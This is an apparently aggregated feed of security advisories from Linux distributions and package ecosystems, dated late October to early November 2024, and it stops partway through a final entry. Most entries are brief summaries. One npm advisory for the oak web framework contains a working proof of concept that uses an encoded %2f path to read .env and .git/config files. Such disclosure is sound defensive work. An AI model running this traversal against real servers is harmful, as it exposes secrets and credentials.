31.10.2024 12:34:16 | suse | [SUSE-SU-2024:3852-1] Security update for the Linux Kernel (Live Patch 10 for SLE 15 SP5) (important) | Security update for the Linux Kernel (Live Patch 10 for SLE 15 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3852-1
31.10.2024 12:34:06 | suse | [SUSE-SU-2024:3851-1] Security update for the Linux Kernel (Live Patch 25 for SLE 15 SP4) (important) | Security update for the Linux Kernel (Live Patch 25 for SLE 15 SP4) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3851-1
31.10.2024 12:33:57 | suse | [SUSE-SU-2024:3850-1] Security update for the Linux Kernel (Live Patch 40 for SLE 15 SP3) (important) | Security update for the Linux Kernel (Live Patch 40 for SLE 15 SP3) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3850-1
31.10.2024 12:33:47 | suse | [SUSE-SU-2024:3849-1] Security update for the Linux Kernel (Live Patch 48 for SLE 15 SP2) (important) | Security update for the Linux Kernel (Live Patch 48 for SLE 15 SP2) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3849-1
31.10.2024 12:33:38 | suse | [SUSE-SU-2024:3848-1] Security update for the Linux Kernel (Live Patch 45 for SLE 15 SP2) (important) | Security update for the Linux Kernel (Live Patch 45 for SLE 15 SP2) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3848-1
31.10.2024 11:09:34 | ubuntu | [USN-7086-1] Firefox vulnerabilities | Several security issues were fixed in Firefox. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7086-1
31.10.2024 10:55:44 | ubuntu | [USN-7087-1] libarchive vulnerability | libarchive could be made to crash or run programs as your login if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7087-1
31.10.2024 10:50:21 | suse | [SUSE-SU-2024:3844-1] Security update for 389-ds (important) | Security update for 389-ds | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3844-1
31.10.2024 10:50:06 | suse | [SUSE-SU-2024:3843-1] Security update for 389-ds (important) | Security update for 389-ds | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3843-1
31.10.2024 09:33:50 | suse | [SUSE-SU-2024:3842-1] Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5) (important) | Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3842-1
31.10.2024 21:20:49 | pypi | [PYSEC-2024-112] chuanhuchatgpt vulnerability (high) | An arbitrary file read vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20240628 due to insufficient validation when loading prompt template files. An attacker can read any file that matches specific criteria using an absolute path. The file must not have a .json extension and, except for the first line, every other line must contain commas. This vulnerability allows reading parts of format-compliant files, including code and log files, which may contain highly sensitive information such as account credentials. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-112
31.10.2024 21:20:49 | pypi | [PYSEC-2024-113] chuanhuchatgpt vulnerability (medium) | In the latest version (20240628) of gaizhenbiao/chuanhuchatgpt, an issue exists in the /file endpoint that allows authenticated users to access the chat history of other users. When a user logs in, a directory is created in the history folder with the user's name. By manipulating the /file endpoint, an authenticated user can enumerate and access files in other users' directories, leading to unauthorized access to private chat histories. This vulnerability can be exploited to read any user's private chat history. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-113
31.10.2024 19:22:25 | pypi | [PYSEC-2024-111] langchain vulnerability (critical) | A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-111
31.10.2024 23:22:28 | pypi | [PYSEC-2024-114] langchain vulnerability (critical) | A vulnerability in the GraphCypherQAChain class of langchain-ai/langchainjs versions 0.2.5 and all versions with this class allows for prompt injection, leading to SQL injection. This vulnerability permits unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-114
02.11.2024 05:32:21 | fedora | [FEDORA-2024-0c1c9227e5] Fedora 40: mysql8.0 | MySQL 8.0.40. Release notes: https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-40.html | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0c1c9227e5
02.11.2024 04:25:11 | fedora | [FEDORA-2024-d2e583eab4] Fedora 41: polkit | Setting loglevels and target via LogControl now allowed to root only. https://github.com/polkit-org/polkit/issues/506 https://github.com/polkit-org/polkit/issues/507 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d2e583eab4
02.11.2024 04:25:10 | fedora | [FEDORA-2024-4e0b4ce6ad] Fedora 41: webkitgtk
Update to WebKitGTK 2.46.3:
- Flatten layers to a plane when preserve-3d style is set.
- Fix DuckDuckGo links by adding a user agent quirk.
- Fix several crashes and rendering issues.
- Fixes: CVE-2024-44244, CVE-2024-44296
Changes from WebKitGTK 2.46.2:
- Own well-known bus name on a11y bus.
- Improve memory consumption when putImageData is used repeatedly on accelerated canvas.
- Disable cached web process suspension for now to prevent leaks.
- Improve text kerning with different combinations of antialias and hinting settings.
- Destroy all network sessions on process exit.
- Fix visible rectangle calculation when there are animations.
- Fix the build with ENABLE_NOTIFICATIONS=OFF.
- Fix several crashes and rendering issues.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4e0b4ce6ad

02.11.2024 04:25:07 | fedora | [FEDORA-2024-c0961d31b8] Fedora 41: krb5
Security:
- CVE-2024-3596: Fix for BlastRADIUS vulnerability in libkrad (support for Message-Authenticator attribute)
- Marvin attack: Removal of the "RSA" method for PKINIT
- Fix of miscellaneous mistakes in the code
Enhancement:
- Rework of TCP request timeout (disabled by default, global timeout setting added)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c0961d31b8

02.11.2024 04:25:00 | fedora | [FEDORA-2024-9bef6cc6d4] Fedora 41: mysql8.0 | MySQL 8.0.40. Release notes: https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-40.html | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9bef6cc6d4
01.11.2024 23:37:13 | npm | [NPM:GHSA-QM92-93FV-VH7M] Path traversal in oak allows transfer of hidden files within the served root directory (high)

### Summary

By default `oak` does not allow transferring of hidden files with the `Context.send` API. However, this can be bypassed by encoding `/` as its URL encoded form `%2F`.

### Details

1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first.

2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`.

### PoC

```ts
// server.ts
import { Application } from "jsr:@oak/oak@17.1.2";

const app = new Application();

app.use(async (context, next) => {
  try {
    await context.send({
      root: './root',
      hidden: false, // default
    });
  } catch {
    await next();
  }
});

await app.listen({ port: 8000 });
```

In terminal:

```bash
# setup root directory
mkdir root/.git
echo SECRET_KEY=oops > root/.env
echo oops > root/.git/config

# start server
deno run -A server.ts

# in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config
```

### Impact

For an attacker this has potential to read sensitive user data or to gain access to server secrets.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QM92-93FV-VH7M

01.11.2024 23:37:53 | npm | [NPM:GHSA-HHHV-GGJX-Q9J2] Glossarizer Cross-site Scripting vulnerability (moderate) | Glossarizer through 1.5.2 improperly tries to convert text into HTML. Even though the application itself escapes special characters (e.g., <>), the underlying library converts these encoded characters into legitimate HTML, thereby possibly causing stored XSS. Attackers can append an XSS payload to a word that has a corresponding glossary entry. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HHHV-GGJX-Q9J2
01.11.2024 23:39:33 | npm | [NPM:GHSA-FQ9M-V26V-2M4F] lilconfig Code Injection vulnerability (high) | Versions of the package lilconfig from 3.1.0 and before 3.1.1 are vulnerable to Arbitrary Code Execution due to the insecure usage of eval in the dynamicImport function. An attacker can exploit this vulnerability by passing a malicious input through the defaultLoaders function. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQ9M-V26V-2M4F
01.11.2024 23:38:11 | maven | [MAVEN:GHSA-MCW3-H5XG-R95M] JeecgBoot SQL Injection vulnerability (high) | JeecgBoot v3.7.1 was discovered to contain a SQL injection vulnerability via the component `/onlDragDatasetHead/getTotalData`. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MCW3-H5XG-R95M
01.11.2024 22:47:57 | pypi | [PYSEC-2024-111] langchain vulnerability | A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-111
01.11.2024 23:22:08 | pypi | [PYSEC-2024-115] langchain vulnerability | A vulnerability in the GraphCypherQAChain class of langchain-ai/langchain version 0.2.5 allows for SQL injection through prompt injection. This vulnerability can lead to unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-115
01.11.2024 23:22:09 | pypi | [PYSEC-2024-116] lollms vulnerability | A vulnerability in the discussion image upload function of the Lollms application, version v9.9, allows for the uploading of SVG files. Due to incomplete filtering in the sanitize_svg function, this can lead to cross-site scripting (XSS) vulnerabilities, which in turn pose a risk of remote code execution. The sanitize_svg function only removes script elements and 'on*' event attributes, but does not account for other potential vectors for XSS within SVG files. This vulnerability can be exploited when authorized users access a malicious URL containing the crafted SVG file. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-116
03.11.2024 04:38:47 | fedora | [FEDORA-2024-e82145eb25] Fedora 40: python-single-version | Initial import | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e82145eb25
04.11.2024 06:23:41 | fedora | [FEDORA-2024-aad3597d9e] Fedora 41: chromium | Update to 130.0.6723.91 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aad3597d9e
04.11.2024 06:17:18 | fedora | [FEDORA-2024-b92c0289c9] Fedora 40: chromium | Update to 130.0.6723.91 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b92c0289c9
04.11.2024 03:37:38 | fedora | [FEDORA-2024-00d1a85917] Fedora 39: chromium | Update to 130.0.6723.91 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-00d1a85917
04.11.2024 03:37:37 | fedora | [FEDORA-2024-0f8a88da75] Fedora 39: webkitgtk
Update to WebKitGTK 2.46.3:
- Flatten layers to a plane when preserve-3d style is set.
- Fix DuckDuckGo links by adding a user agent quirk.
- Fix several crashes and rendering issues.
- Fixes: CVE-2024-44244, CVE-2024-44296
Changes from WebKitGTK 2.46.2:
- Own well-known bus name on a11y bus.
- Improve memory consumption when putImageData is used repeatedly on accelerated canvas.
- Disable cached web process suspension for now to prevent leaks.
- Improve text kerning with different combinations of antialias and hinting settings.
- Destroy all network sessions on process exit.
- Fix visible rectangle calculation when there are animations.
- Fix the build with ENABLE_NOTIFICATIONS=OFF.
- Fix several crashes and rendering issues.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0f8a88da75

04.11.2024 00:01:19 | almalinux | [ALSA-2024:8729] firefox security update (moderate) | firefox security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8729
03.11.2024 21:14:25 | almalinux | [ALSA-2024:8678] grafana security update (important) | grafana security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8678
03.11.2024 21:17:25 | almalinux | [ALSA-2024:8617] kernel security update (moderate) | kernel security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8617
06.11.2024 17:27:51 | npm | [NPM:GHSA-96G7-G7G9-JXW8] happy-dom allows for server side code to be executed by a